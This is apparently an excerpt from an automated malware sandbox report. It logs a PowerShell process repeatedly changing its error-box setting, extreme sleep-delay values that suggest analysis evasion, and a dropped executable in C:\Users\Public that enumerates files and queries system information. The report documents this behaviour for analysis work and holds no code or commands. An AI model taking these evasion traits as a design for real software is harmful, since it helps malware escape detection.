        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1888Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3141Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 673Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1800Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1157Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -8301034833169293s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 1800 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 1157 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884Thread sleep count: 43 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -11990383647911201s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep count: 46 > 30Jump to behavior
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -2760000s >= -30000sJump to behavior
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -2700000s >= -30000sJump to behavior
        Source: C:\Users\Public\snd32sys.exe TID: 4404Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\Public\snd32sys.exeLast function: Thread delayed
        Source: C:\Users\Public\snd32sys.exeLast function: Thread delayed
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,16_2_0065838E
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657FD2 FindFirstFileExW,16_2_00657FD2
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,16_2_006133E0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\Public\snd32sys.exeThread delayed: delay time: 60000Jump to behavior
